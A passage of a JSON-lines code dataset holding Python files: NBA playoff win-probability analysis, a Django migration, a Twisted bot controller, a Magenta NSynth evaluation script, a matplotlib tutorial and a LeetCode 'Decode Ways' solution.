playoffseries.merge(w_pct, how='left', left_on=[h_v+'court_team_id','season'], right_on=['team','season']\n ).drop(columns=['team']\n ).rename(columns={'W_pct':h_v+'court_wpct'})\n playoffseries.loc[:,'wpct_diff'] = playoffseries['homecourt_wpct'] - playoffseries['visitorcourt_wpct']\n\n for team_column in ['homecourt_team_id', 'visitorcourt_team_id']:\n playoffseries = self.df_ids(playoffseries, 'team', ['abbreviation'], column_convert={'abbreviation':team_column.replace('_id','')}, header_override=team_column)\n playoffseries = self.df_ids(playoffseries, 'series', ['series_name','conference','round'])\n playoffseries = playoffseries.set_index('false_series_id')\n\n playoffseries.loc[:,'series_games'] = playoffseries[['homecourt_wins','visitorcourt_wins']].max(axis=1) * 2 - 1\n current_check = playoffseries['season'] == dt.date.today().year\n assert ((playoffseries['series_games'].isin([5,7])) | (current_check)).mean() == 1, 'series games must be 5 or 7.'\n gamesreq_check = ((playoffseries['games_required'] > playoffseries['series_games']) & (~current_check)).sum()\n assert gamesreq_check == 0, 'Games required must be less than or equal to series games, in {} cases it is not'.format(gamesreq_check)\n\n playoffseries.loc[:,'homecourt_victory'] = playoffseries['homecourt_wins'] > playoffseries['visitorcourt_wins']\n playoffseries.loc[:,'victor'] = playoffseries['homecourt_team'].where(playoffseries['homecourt_victory'], playoffseries['visitorcourt_team'])\n playoffseries.loc[:,'loser'] = playoffseries['homecourt_team'].where(~playoffseries['homecourt_victory'], playoffseries['visitorcourt_team'])\n\n series_wins = playoffgames[['false_series_id','game_no', 'home_wins']].set_index(['false_series_id','game_no']).unstack()\n series_wins.columns = ['homegame_'+str(header[1]) for header in series_wins.columns]\n playoffseries = playoffseries.merge(series_wins, how='left', left_index=True, right_index=True)\n\n self.set_summary(games_name)\n self.summary[self.current_summary] = playoffgames\n self.set_summary(series_name)\n self.summary[self.current_summary] = playoffseries\n\n def win_probability(self, score, playoffseries=pd.DataFrame(), comeback=True, flipscore=True, force_game=None,\n rounds=[1,2,3,4], series_games=[5,7], wpct_column='wpct_diff', wpct=(-1,1), seasons=1983):\n '''Calculates the probability of a team winning or forcing a game given a series score.\n By default, calculates the probability of a comeback win and is ambivalent to the home team in the score.\n If the score is even, it is considered a comeback for the team without homecourt advantage to win.\n Prints the probability and returns all instances where a team was successul.\n\n Keyword arguments:\n score - A string of the score of interest, in format \"[0-4]-[0-4]\"\n playoffseries - The df containing playoff series. If not provided, will use default query of db (default pd.DataFrame())\n comeback - If True, the probability refers to the team currently losing coming back and winning (default True)\n flipscore - If True, the score provided will also be flipped, i.e. 
ambivalent to homecourt advantage (default True)\n force_game - Set this to calculate the probabilty of forcing a game instead of just winning (default None)\n rounds - The playoff rounds to include, provide a list of ints.\n Round 1 is the finals, each subsequent number is the round less significant.\n Round 4 is the current first round of the playoffs (default [1,2,3,4])\n series_games - Specify the length of rounds to include as a list of ints (default [5,7])\n wpct_column - The column to apply the wpct filter to (default 'wpct_diff')\n wpct - Games with a wpct in this range will be included (default (-1,1))\n seasons - Specify the seasons to include. If an int is provided, it will be used a min,\n otherwise provide a min/max list/tuple (default 1983)\n '''\n # if no df is specified, query db if required and use store playoffseries df\n if playoffseries.empty:\n if 'playoffseries' not in self.summary.keys():\n self.playoffseries()\n playoffseries = self.summary['playoffseries']\n\n filtered_series = playoffseries[playoffseries['round'].isin(rounds)]\n filtered_series = filtered_series[filtered_series['series_games'].isin(series_games)]\n filtered_series = filtered_series[filtered_series[wpct_column].between(wpct[0],wpct[1])]\n\n if type(seasons) == int:\n seasons = (seasons, filtered_series['season'].max()+1)\n\n assert type(seasons) == tuple or type(seasons) == list, 'seasons must be an int or list/tuple'\n assert len(seasons) == 2, 'seasons must be an int or of length 2, {} of {} provided'.format(type(seasons), len(seasons))\n filtered_series = filtered_series[filtered_series['season'].between(seasons[0], seasons[1])]\n\n home_wins = int(score[0])\n visitor_wins = int(score[-1])\n\n if home_wins == visitor_wins:\n home_ahead = True\n flipscore = False\n else:\n home_ahead = home_wins > visitor_wins\n check_homewin = not home_ahead if comeback else home_ahead\n scores = [score, score[::-1]] if flipscore else [score]\n\n if flipscore:\n prob_str = 'losing'\n else:\n prob_str = 'home' if check_homewin else 'visitor'\n winning_str = 'forcing game {}'.format(force_game) if force_game else 'winning'\n print('Probability of {} team {}: '.format(prob_str, winning_str), end='')\n\n packages = []\n for filter_score in scores:\n filter1 = filtered_series['series_timeline'].str.contains(filter_score)\n packages.append(winfilter(filtered_series, filter1, home_victor=check_homewin, force_game=force_game))\n check_homewin = not check_homewin\n\n package2 = (0,0,pd.DataFrame()) if len(packages) == 1 else packages[1]\n\n return playoff_probability(filtered_series, packages[0], package2)\n\ndef winfilter(playoffseries, filter1, home_victor=True, force_game=None):\n '''Applies the filter specified and then finds the occasions where teams have won/forced game x from this position.\n Returns:\n num - the number of times teams in the applied filter have won.\n den - the total number of times this filter has occurred.\n combined_filter - the filter matching scenarios where teams have won in this scenario\n\n Keyword arguments:\n playoffseries - The df containing playoff series.\n filter1 - The filter to use to get the series in question, must be same size as playoffseries df\n home_victor - If True, will return results for cases where the home team is victorious (default True)\n force_game - If set, the series reaching the given game will be considered a \"victory\"\n i.e. 
results will now relate to the scenario of forcing game x (default None)\n '''\n if force_game:\n filter2 = playoffseries['games_required'] >= force_game\n else:\n filter2 = playoffseries['homecourt_victory'] if home_victor else ~playoffseries['homecourt_victory']\n combined_filter = filter1 & filter2\n num = sum(combined_filter)\n den = sum(filter1)\n return num, den, combined_filter\n\ndef playoff_probability(playoffseries, package1, package2=(0,0,pd.DataFrame())):\n '''Takes the num, den and combined filter from winfilter function.\n Returns the probability results and instances where teams have been successful.\n\n Keyword arguments:\n playoffseries - The df containing playoffseries.\n package1 - a tuple containing num, den and combined_filter.\n package2 - a tuple containing num, den and combined_filter (default (0,0,pd.DataFrame()))\n '''\n num = package1[0] + package2[0]\n den = package1[1] + package2[1]\n print('{:.1%} ({}/{})'.format(num/den, num, den))\n des_columns = ['season','series_name','homecourt_team','homecourt_wpct','visitorcourt_team','visitorcourt_wpct',\n 'wpct_diff','homecourt_wins','visitorcourt_wins','victor','loser','homecourt_victory','series_timeline']\n\n if not package2[2].empty:\n return playoffseries[package1[2]|package2[2]][des_columns].sort_values('season', ascending=False)\n else:\n return playoffseries[package1[2]][des_columns].sort_values('season', ascending=False)\n","sub_path":"nba_stats/read_write/basic_stats.py","file_name":"basic_stats.py","file_ext":"py","file_size_in_byte":43780,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"}
{"seq_id":"174933445","text":"# -*- coding: utf-8 -*-\nfrom south.utils import datetime_utils as datetime\nfrom south.db import db\nfrom south.v2 import SchemaMigration\nfrom django.db import models\n\n\nclass Migration(SchemaMigration):\n\n def forwards(self, orm):\n # Adding model 'VideoAlbum'\n db.create_table(u'video_videoalbum', (\n (u'id', self.gf('django.db.models.fields.AutoField')(primary_key=True)),\n ('title', self.gf('django.db.models.fields.CharField')(default=u'', max_length=255)),\n ))\n db.send_create_signal(u'video', ['VideoAlbum'])\n\n # Adding model 'Video'\n db.create_table(u'video_video', (\n (u'id', self.gf('django.db.models.fields.AutoField')(primary_key=True)),\n ('title', self.gf('django.db.models.fields.CharField')(default=u'', max_length=255)),\n ('source', self.gf('embed_video.fields.EmbedVideoField')(max_length=254, blank=True)),\n ))\n db.send_create_signal(u'video', ['Video'])\n\n # Adding M2M table for field album on 'Video'\n m2m_table_name = db.shorten_name(u'video_video_album')\n db.create_table(m2m_table_name, (\n ('id', models.AutoField(verbose_name='ID', primary_key=True, auto_created=True)),\n ('video', models.ForeignKey(orm[u'video.video'], null=False)),\n ('videoalbum', models.ForeignKey(orm[u'video.videoalbum'], null=False))\n ))\n db.create_unique(m2m_table_name, ['video_id', 'videoalbum_id'])\n\n\n def backwards(self, orm):\n # Deleting model 'VideoAlbum'\n db.delete_table(u'video_videoalbum')\n\n # Deleting model 'Video'\n db.delete_table(u'video_video')\n\n # Removing M2M table for field album on 'Video'\n db.delete_table(db.shorten_name(u'video_video_album'))\n\n\n models = {\n u'video.video': {\n 'Meta': {'object_name': 'Video'},\n 'album': ('django.db.models.fields.related.ManyToManyField', [], {'related_name': \"u'videos'\", 'symmetrical': 'False', 'to': u\"orm['video.VideoAlbum']\"}),\n u'id': ('django.db.models.fields.AutoField', 
[], {'primary_key': 'True'}),\n 'source': ('embed_video.fields.EmbedVideoField', [], {'max_length': '254', 'blank': 'True'}),\n 'title': ('django.db.models.fields.CharField', [], {'default': \"u''\", 'max_length': '255'})\n },\n u'video.videoalbum': {\n 'Meta': {'object_name': 'VideoAlbum'},\n u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),\n 'title': ('django.db.models.fields.CharField', [], {'default': \"u''\", 'max_length': '255'})\n }\n }\n\n complete_apps = ['video']","sub_path":"strongme/video/migrations/0001_initial.py","file_name":"0001_initial.py","file_ext":"py","file_size_in_byte":2670,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"38821011","text":"from twisted.internet import reactor\n\nfrom src.comm.bot import Bot\nfrom src.comm.parser_factory import ParserFactory\nfrom src.comm.protocol_factory import ProtocolFactory\n\n\nclass CommControl:\n\n def __init__(self):\n\n self.__protocol_factory = ProtocolFactory()\n self.__parser_factory = ParserFactory()\n self.__setup_reactor()\n\n def use_command(self, command):\n\n exchange_bot = self.__create_exchange_bot(command)\n exchange_bot.run()\n\n def __setup_reactor(self):\n\n # ought to be triggered when shutting down\n def stop():\n reactor.stop()\n\n reactor.runReturn()\n reactor.addSystemEventTrigger('before', 'shutdown', stop)\n\n def __create_exchange_bot(self, specification):\n\n protocol_class = self.__get_protocol_class(specification[\"protocol\"])\n parser_class = self.__get_parser_class(self.__get_parser_name(specification))\n\n exchange_bot = Bot(\n protocol_class,\n parser_class,\n specification[\"address\"],\n specification[\"action\"],\n specification[\"parameters\"]\n )\n\n return exchange_bot\n\n def __get_protocol_class(self, protocol_name):\n\n if protocol_name in self.__protocol_factory.get_protocols():\n return self.__protocol_factory.create(protocol_name)\n else:\n raise AttributeError(\"No such protocol\")\n\n def __get_parser_class(self, parser_name):\n\n if parser_name in self.__parser_factory.get_parsers():\n return self.__parser_factory.create(parser_name)\n else:\n raise AttributeError(\"No such parser\")\n\n def __get_parser_name(self, specification):\n\n return specification[\"name\"] + \" \" + specification[\"protocol\"]","sub_path":"EasyCrypto/src/comm/comm_control.py","file_name":"comm_control.py","file_ext":"py","file_size_in_byte":1766,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"619652226","text":"# Copyright 2017 Google Inc. All Rights Reserved.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\nr\"\"\"The evaluation script.\n\nThis script requires tensorflow 1.1.0-rc1 or beyond.\nAs of 04/05/17 this requires installing tensorflow from source,\n(https://github.com/tensorflow/tensorflow/releases)\n\nSo that it works locally, the default worker_replicas and total_batch_size are\nset to 1. 
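A minimal local invocation might look like this (paths here are hypothetical):\n\n python eval.py --config=h512_bo16 --eval_path=/path/to/eval.tfrecord --checkpoint_dir=/tmp/nsynth --logdir=/tmp/nsynth\n\n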
For training in 200k iterations, they both should be 32.\n\"\"\"\n\nimport tensorflow as tf\nimport tensorflow_probability as tfp\nimport numpy as np\nimport os\nimport pickle\n\nfrom magenta.models.nsynth import utils\n\nslim = tf.contrib.slim\nFLAGS = tf.app.flags.FLAGS\n\ntf.app.flags.DEFINE_string(\"master\", \"\",\n \"BNS name of the TensorFlow master to use.\")\ntf.app.flags.DEFINE_string(\"config\", \"h512_bo16\", \"Model configuration name\")\ntf.app.flags.DEFINE_integer(\"task\", 0,\n \"Task id of the replica running the training.\")\ntf.app.flags.DEFINE_integer(\"worker_replicas\", 1,\n \"Number of replicas. We train with 32.\")\ntf.app.flags.DEFINE_integer(\"ps_tasks\", 0,\n \"Number of tasks in the ps job. If 0 no ps job is \"\n \"used. We typically use 11.\")\ntf.app.flags.DEFINE_integer(\"total_batch_size\", 1,\n \"Batch size spread across all sync replicas.\"\n \"We use a size of 32.\")\ntf.app.flags.DEFINE_integer(\"sample_length\", 64000,\n \"Raw sample length of input.\")\ntf.app.flags.DEFINE_integer(\"num_evals\", None,\n \"number of evaluations -- None evaluates the entire dataset\")\ntf.app.flags.DEFINE_string(\"logdir\", \"/tmp/nsynth\",\n \"The log directory for this experiment.\")\ntf.app.flags.DEFINE_string(\"checkpoint_dir\", \"/tmp/nsynth\",\n \"Where the checkpoints are stored\")\ntf.app.flags.DEFINE_string(\"checkpoint_path\", None,\n \"path of checkpoint -- if none use checkpoint_dir\")\ntf.app.flags.DEFINE_string(\"problem\", \"nsynth\",\n \"Which problem setup (i.e. dataset) to use\")\ntf.app.flags.DEFINE_string(\"eval_path\", \"\", \"The path to the train tfrecord.\")\ntf.app.flags.DEFINE_string(\"log\", \"INFO\",\n \"The threshold for what messages will be logged.\"\n \"DEBUG, INFO, WARN, ERROR, or FATAL.\")\ntf.app.flags.DEFINE_bool(\"vae\", False,\n \"Whether or not to train variationally\")\ntf.app.flags.DEFINE_bool(\"small\", False,\n \"Whether to use full model i.e. 
30 layers in decoder/encoder, or the reduced model\")\ntf.app.flags.DEFINE_integer(\"asymmetric\", 0,\n \"Whether to have equal number of layers in decoder/encoder or a weaker decoder\")\ntf.app.flags.DEFINE_bool(\"kl_annealing\", False,\n \"Whether to use kl_annealing\")\ntf.app.flags.DEFINE_float(\"aux_coefficient\", 0,\n \"coefficient for auxiliary loss\")\ntf.app.flags.DEFINE_float(\"annealing_loc\", 1750.,\n \"params of normal cdf for annealing\")\ntf.app.flags.DEFINE_float(\"annealing_scale\", 150.,\n \"params of normal cdf for annealing\")\ntf.app.flags.DEFINE_float(\"kl_threshold\", None,\n \"Threshold with which to bound KL-Loss\")\ntf.app.flags.DEFINE_float(\"input_dropout\", 1,\n \"How much dropout at input to add\")\n\ndef main(unused_argv=None):\n tf.logging.set_verbosity(FLAGS.log)\n\n if FLAGS.config is None:\n raise RuntimeError(\"No config name specified.\")\n\n if FLAGS.vae:\n config = utils.get_module(\"wavenet.\" + FLAGS.config).VAEConfig(\n FLAGS.eval_path, sample_length=FLAGS.sample_length, problem=FLAGS.problem, small=FLAGS.small, asymmetric=FLAGS.asymmetric, aux=FLAGS.aux_coefficient, dropout=FLAGS.input_dropout)\n else:\n config = utils.get_module(\"wavenet.\" + FLAGS.config).Config(\n FLAGS.eval_path, sample_length=FLAGS.sample_length, problem=FLAGS.problem, small=FLAGS.small, asymmetric=FLAGS.asymmetric)\n\n logdir = FLAGS.logdir\n tf.logging.info(\"Saving to %s\" % logdir)\n\n with tf.Graph().as_default():\n total_batch_size = FLAGS.total_batch_size\n assert total_batch_size % FLAGS.worker_replicas == 0\n worker_batch_size = total_batch_size / FLAGS.worker_replicas\n\n # Run the Reader on the CPU\n cpu_device = \"/job:localhost/replica:0/task:0/cpu:0\"\n if FLAGS.ps_tasks:\n cpu_device = \"/job:worker/cpu:0\"\n\n with tf.device(cpu_device):\n inputs_dict = config.get_batch(worker_batch_size, is_training=False)\n\n with tf.device(\n tf.train.replica_device_setter(ps_tasks=FLAGS.ps_tasks,\n merge_devices=True)):\n global_step = tf.get_variable(\n \"global_step\", [],\n tf.int32,\n initializer=tf.constant_initializer(0),\n trainable=False)\n\n # build the model graph\n outputs_dict = config.build(inputs_dict, is_training=False)\n\n if FLAGS.vae:\n if FLAGS.kl_annealing:\n dist = tfp.distributions.Normal(loc=FLAGS.annealing_loc, scale=FLAGS.annealing_scale)\n annealing_rate = dist.cdf(tf.to_float(global_step)) # how to adjust the annealing\n else:\n annealing_rate = 0.\n kl = outputs_dict[\"loss\"][\"kl\"]\n rec = outputs_dict[\"loss\"][\"rec\"]\n aux = outputs_dict[\"loss\"][\"aux\"]\n tf.summary.scalar(\"kl\", kl)\n tf.summary.scalar(\"rec\", rec)\n tf.summary.scalar(\"annealing_rate\", annealing_rate)\n if FLAGS.kl_threshold is not None:\n kl = tf.maximum(tf.cast(FLAGS.kl_threshold, dtype=kl.dtype), kl)\n if FLAGS.aux_coefficient > 0:\n tf.summary.scalar(\"aux\", aux)\n loss = rec + annealing_rate*kl + tf.cast(FLAGS.aux_coefficient, dtype=tf.float32)*aux\n else:\n loss = outputs_dict[\"loss\"]\n \n tf.summary.scalar(\"train_loss\", loss)\n\n labels = inputs_dict[\"parameters\"]\n x_in = inputs_dict[\"wav\"]\n batch_size, _ = x_in.get_shape().as_list()\n predictions = outputs_dict[\"predictions\"]\n _, pred_dim = predictions.get_shape().as_list()\n predictions = tf.reshape(predictions, [batch_size, -1, pred_dim])\n encodings = outputs_dict[\"encoding\"]\n\n\n session_config = tf.ConfigProto(allow_soft_placement=True)\n\n # Define the metrics:\n if FLAGS.vae:\n names_to_values, names_to_updates = slim.metrics.aggregate_metric_map({\n 'eval/kl': 
slim.metrics.streaming_mean(kl),\n 'eval/rec': slim.metrics.streaming_mean(rec),\n 'eval/loss': slim.metrics.streaming_mean(loss),\n 'eval/predictions': slim.metrics.streaming_concat(predictions),\n 'eval/labels': slim.metrics.streaming_concat(labels),\n 'eval/encodings': slim.metrics.streaming_concat(encodings),\n 'eval/audio': slim.metrics.streaming_concat(x_in)\n })\n else:\n names_to_values, names_to_updates = slim.metrics.aggregate_metric_map({\n 'eval/loss': slim.metrics.streaming_mean(loss),\n 'eval/predictions': slim.metrics.streaming_concat(predictions),\n 'eval/labels': slim.metrics.streaming_concat(labels),\n 'eval/encodings': slim.metrics.streaming_concat(encodings),\n 'eval/audio': slim.metrics.streaming_concat(x_in)\n })\n\n print('Running evaluation Loop...')\n if FLAGS.checkpoint_path is not None:\n checkpoint_path = FLAGS.checkpoint_path\n else:\n checkpoint_path = tf.train.latest_checkpoint(FLAGS.checkpoint_dir)\n metric_values = slim.evaluation.evaluate_once(\n num_evals=FLAGS.num_evals,\n master=FLAGS.master,\n checkpoint_path=checkpoint_path,\n logdir=FLAGS.logdir,\n eval_op=names_to_updates.values(),\n final_op=names_to_values.values(),\n session_config=session_config)\n\n names_to_values = dict(zip(names_to_values.keys(), metric_values))\n\n losses = {}\n data_name = FLAGS.eval_path.split('/')[-1].split('.')[0]\n outpath = os.path.join(FLAGS.logdir, data_name)\n for k, v in names_to_values.items():\n name = k.split('/')[-1]\n if name in ['predictions', 'encodings', 'labels', 'audio']:\n out = outpath+'-{}'.format(name)\n if name == 'predictions':\n v = np.argmax(v, axis = -1)\n v = utils.inv_mu_law_numpy(v - 128)\n np.save(out, v)\n else:\n losses[name] = v\n\n out_loss = outpath+'-losses.pickle'\n with open(out_loss, 'wb') as w:\n pickle.dump(losses, w)\n\n\n\n\ndef console_entry_point():\n tf.app.run(main)\n\n\nif __name__ == \"__main__\":\n console_entry_point()","sub_path":"magenta/models/nsynth/wavenet/eval.py","file_name":"eval.py","file_ext":"py","file_size_in_byte":9276,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"}
{"seq_id":"623141513","text":" # -*- coding: utf-8 -*-\n\"\"\"\n@time:2018/8/5 12:01\n\n@author: BX\n\"\"\"\nimport matplotlib.pyplot as plt\nimport pandas as pd\nimport numpy as np\n'Linear equation'\n#figure,show,plot\n# x=np.linspace(-1,1,50)\n# y1=2*x+1\n# y2=x**2+1\n# plt.figure()\n# plt.plot(x,y1,'g')#g,r,y,b\n# plt.figure(num=3,figsize=(8,6))\n# 'Axis settings'\n# plt.xlim((-1,2))# axis range\n# plt.ylim((-2,3))\n# plt.xlabel('I am y')# axis label\n# plt.ylabel('I am x')\n# new_ticks=np.linspace(-1,2,5)# axis tick values\n# plt.xticks(new_ticks)# replace the xticks\n# plt.yticks([-2,-1.8,-1,1.22,3],\n# [r'$really\\ good$',r'$bad\\ \\alpha$',r'$normal$',r'$good$',r'$really\\ good$'])# $...$ renders labels in a math-style font\n# #gca=get current axis\n# ax=plt.gca()# get the current axes\n# ax.spines['right'].set_color('none')# spines are the axis borders\n# ax.spines['top'].set_color('none')\n# ax.xaxis.set_ticks_position('bottom')# which spine stands in for the axis, effectively creating the x-axis\n# ax.yaxis.set_ticks_position('left')# effectively creating the y-axis\n# # set the axis position\n# ax.spines['bottom'].set_position(('data',0))# place the horizontal axis at a y data value; 'axes' instead positions it at a percentage of the axes\n# ax.spines['left'].set_position(('data',0))\n#\n# 'Legend settings'\n# l1,=plt.plot(x,y2,'r',label='up')\n# l2,=plt.plot(x,y1,'b--',linewidth=2,label='down')\n# plt.legend(handles=[l1,l2,],labels=['a','b'],loc='best')# loc='best' places the legend at the best position\n#\n# 'Adding annotations'\n# x=np.linspace(-3,3,50)\n# y=2*x+1\n# plt.figure(num=4,figsize=(8,5))\n# plt.plot(x,y)\n# ax=plt.gca()# get the current axes\n# ax.spines['right'].set_color('none')# spines are the axis borders\n# ax.spines['top'].set_color('none')\n# ax.xaxis.set_ticks_position('bottom')# which spine stands in for the axis, effectively creating the x-axis\n# ax.yaxis.set_ticks_position('left')# effectively creating the y-axis\n# # set the axis position\n# ax.spines['bottom'].set_position(('data',0))# place the horizontal axis at a y data value; 'axes' instead positions it at a percentage of the axes\n# ax.spines['left'].set_position(('data',0))\n# x0=1\n# y0=2*x0+1\n# plt.scatter(x0,y0,s=50,color='b')\n# plt.plot([x0,x0],[y0,0],'k--',lw=2.5)\n# #method 1\n# plt.annotate(r'$2x+1=%s$'%y0,xy=(x0,y0),xycoords='data',xytext=(+30,-30),textcoords='offset points',fontsize=16,arrowprops=dict(arrowstyle='->',connectionstyle='arc3,rad=.2'))\n# #method 2\n# plt.text(-3,3,r'$This\\ is\\ some\\ text.\\ \\mu \\sigma_i \\alpha_t$',fontdict={'size':16,'color':'r'})\n#\n#\n# 'Transparency for parts covered by the line'\n# x=np.linspace(-3,3,50)\n# y=0.1*x\n# plt.figure()\n# plt.plot(x,y,linewidth=10,zorder=1)# the zorder set in the for loop below must be larger than this one\n# plt.ylim(-2,2)\n# ax=plt.gca()# get the current axes\n# ax.spines['right'].set_color('none')# spines are the axis borders\n# ax.spines['top'].set_color('none')\n# ax.xaxis.set_ticks_position('bottom')# which spine stands in for the axis, effectively creating the x-axis\n# ax.yaxis.set_ticks_position('left')# effectively creating the y-axis\n# # set the axis position\n# ax.spines['bottom'].set_position(('data',0))# place the horizontal axis at a y data value; 'axes' instead positions it at a percentage of the axes\n# ax.spines['left'].set_position(('data',0))\n# for label in ax.get_xticklabels() + ax.get_yticklabels():\n# label.set_zorder(2)\n# label.set_fontsize(12)\n# label.set_bbox(dict(facecolor='white',edgecolor='None',alpha=0.7))\n\n\n'Scatter plot'\n# n=1024\n# x=np.random.normal(0,1,n)\n# y=np.random.normal(0,1,n)\n# T=np.arctan2(y,x)# generate (pseudo-)random colors\n# plt.scatter(x,y,s=75,c=T,alpha=0.5)\n# plt.xlim((-1.5,1.5))\n# plt.ylim((-1.5,1.5))\n# plt.xticks(())# no tick labels on the x-axis\n# plt.yticks(())\n# plt.show()\n\n'Bar chart'\n# n=12\n# x=np.arange(n)\n# y1=(1-x/float(n))*np.random.uniform(0.5,1.0,n)\n# y2=(1-x/float(n))*np.random.uniform(0.5,1.0,n)\n# plt.bar(x,+y1,facecolor='#ADD8E6',edgecolor='white')\n# plt.bar(x,-y2,facecolor='#ff9999',edgecolor='white')\n# for x,y in zip(x,y1):\n# plt.text(x,y+0.05,'%.2f'%y,ha='center',va='bottom')\n# x=np.arange(n)\n# for x,y in zip(x,y2):\n# plt.text(x,-y-0.05,'-%.2f'%y,ha='center',va='top')\n# plt.xlim(-5,n)\n# plt.xticks(())\n# plt.ylim(-1.25,1.25)\n# plt.yticks(())\n\n\n'Contour plot'\ndef f(x,y):\n return (1-x/2+x**5+y**3)*np.exp(-x**2-y**2)\nn=250\nx=np.linspace(-3,3,n)\ny=np.linspace(-3,3,n)\nX,Y=np.meshgrid(x,y)# bind x,y into grid input values\nplt.contourf(X,Y,f(X,Y),4,alpha=0.75,cmap='hot')# fill the contours with color; the level count sets how many parts the range is split into\nC=plt.contour(X,Y,f(X,Y),4,colors='black',linewidth=.5)# draw the contour lines\nplt.clabel(C,inline=True,fontsize=10)# label every contour line\n\n'Images'\n# a=np.array([]).reshape(())\n# plt.imshow(a,interpolation='nearest',cmap='bone',origin='lower')# origin can also be 'upper'; interpolation has many modes\n# plt.colorbar(shrink=0.9)# add the colorbar legend on the right\n# plt.xticks(())\n# plt.yticks(())\n# plt.show()\n\n'3D plotting'\nfrom mpl_toolkits.mplot3d import Axes3D\nfig=plt.figure()# the figure frame\nax=Axes3D(fig)# the 3D axes\nX=np.arange(-4,4,0.25)\nY=np.arange(-4,4,0.25)\nX,Y=np.meshgrid(X,Y)# the base plane\nR=np.sqrt(X**2+Y**2)\nZ=np.sin(R)\n\nax.plot_surface(X,Y,Z,rstride=2,cstride=2,cmap=plt.get_cmap('rainbow'))\nax.contourf(X,Y,Z,zdir='z',offset=-2,cmap='rainbow')# where to project the contours\nax.set_zlim(-2,2)\n\n\n'Creating subplots'\nplt.figure()\nplt.subplot(2,1,1)\nplt.plot([0,1],[0,1])\nplt.subplot(2,3,4)\nplt.plot([0,1],[0,2])\nplt.subplot(2,3,5)\nplt.plot([0,1],[0,3])\nplt.subplot(2,3,6)\nplt.plot([0,1],[0,4])\n\n'subplot grid layouts'\n#plt.subplot2grid()\n# plt.figure()\n# ax1=plt.subplot2grid((3,3),(0,0),colspan=3,rowspan=1)\n# ax1.plot([1,2],[1,2])\n# ax1.set_xlabel('x')\n# ax2=plt.subplot2grid((3,3),(1,0),colspan=2)\n# ax3=plt.subplot2grid((3,3),(1,2),rowspan=2)\n# ax4=plt.subplot2grid((3,3),(2,0))\n# ax5=plt.subplot2grid((3,3),(2,1))\n\n#plt.gridspec\n# import matplotlib.gridspec as gridspec\n# plt.figure()\n# gs=gridspec.GridSpec(3,3)\n# ax1=plt.subplot(gs[0,:])\n# ax2=plt.subplot(gs[1,:2])\n# ax3=plt.subplot(gs[1:,2])\n# ax4=plt.subplot(gs[-1,0])\n# ax5=plt.subplot(gs[-1,-2])\n\n\n#plt.subplots()\nf,((ax11,ax12),(ax21,ax22))=plt.subplots(2,2,sharex=True,sharey=True)\nax11.scatter([1,2],[1,2])\n\n'Plot inside a plot'\nfig=plt.figure()\nx=[1,2,3,4,5,6,7]\ny=[1,3,4,2,5,8,6]\nleft,bottom,width,height=0.1,0.1,0.8,0.8\nax1=fig.add_axes([left,bottom,width,height])\nax1.plot(x,y,'r')\nax1.set_xlabel('X')\nax1.set_ylabel('Y')\nax1.set_title('title')\nleft,bottom,width,height=0.2,0.6,0.25,0.25\nax2=fig.add_axes([left,bottom,width,height])\nax2.plot(y,x,'b')\nax2.set_xlabel('X')\nax2.set_ylabel('Y')\nax2.set_title('title inside 1')\n\nplt.axes([0.6,0.2,0.25,0.25])\nplt.plot(y[::-1],x,'g')\nplt.xlabel('X')\nplt.ylabel('Y')\nplt.title('title inside 1')\n\n\n'Secondary axis'\nx=np.arange(0,10,0.1)\ny1=0.05*x**2\ny2=-1*y1\nfig,ax1=plt.subplots()\nax2=ax1.twinx()\nax1.plot(x,y1,'g--')\nax2.plot(x,y2,'b-')\nax1.set_xlabel('X data')\nax1.set_ylabel('Y1',color='g')\nax2.set_ylabel('Y2',color='b')\nax1.set_title('test')\n\n'Animation, must be run from an IDE'\nfrom matplotlib import animation\nfig1,ax=plt.subplots()\nx=np.arange(0,2*np.pi,0.01)\nline,=ax.plot(x,np.sin(x))\ndef animation1(i):\n line.set_ydata(np.sin(x+i/10))# update the data\n return line,\ndef init():\n line.set_ydata(np.sin(x))\n return line,\n# the function varies over time, stepping through 100 frames, updating every 20 milliseconds\nani=animation.FuncAnimation(fig=fig1,func=animation1,frames=100,init_func=init,interval=20,blit=False)# interval: update every 20 milliseconds\n\nplt.show()","sub_path":"study/matplotlib_study.py","file_name":"matplotlib_study.py","file_ext":"py","file_size_in_byte":7134,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"}
{"seq_id":"426414197","text":"\"\"\"\nhttps://leetcode.com/problems/decode-ways/\n\nDP[i][0] => # of decode ways decoding the (i)-th digit as a letter.\nDP[i][1] => # of decode ways decoding (i-1) & (i) together. \n\nIf s[i] != '0', DP[i][0] = DP[i-1][0] + DP[i-1][1]\nElse, DP[i][0] = 0\nIf 1<= int(s[i-1] + s[i]) <= 26, DP[i][1] = DP[i-2][0] + DP[i-2][1]\n\nBe careful about the case if s[i-1] == '0'.\n\nTime complexity: O(N), N = len(s)\n\"\"\"\nclass Solution:\n def numDecodings(self, s: str) -> int:\n N = len(s)\n dp = [[0, 0] for _ in range(N)]\n if s[0] != '0':\n dp[0][0] = 1\n for i in range(1, N):\n if s[i] != '0':\n dp[i][0] = dp[i-1][0] + dp[i-1][1]\n else:\n dp[i][0] = 0\n if s[i-1] != '0' and (0 < int(s[i-1:i+1]) <= 26):\n dp[i][1] = sum(dp[i-2]) if i >= 2 else 1\n return sum(dp[-1])","sub_path":"0091_DecodeWays.py","file_name":"0091_DecodeWays.py","file_ext":"py","file_size_in_byte":860,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"}
{"seq_id":"469242151","text":"# (C) Copyright IBM Corp. 
